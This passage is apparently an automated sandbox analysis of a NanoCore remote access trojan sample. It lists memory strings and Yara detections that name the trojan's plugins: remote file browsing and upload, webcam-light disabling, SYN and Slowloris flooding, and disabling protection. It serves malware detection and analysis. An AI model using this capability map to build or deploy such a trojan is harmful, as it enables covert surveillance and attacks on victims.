anagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
        Source: bGf2H3tXGg.exe, 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
        Source: bGf2H3tXGg.exe, 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exe, 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exe, 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
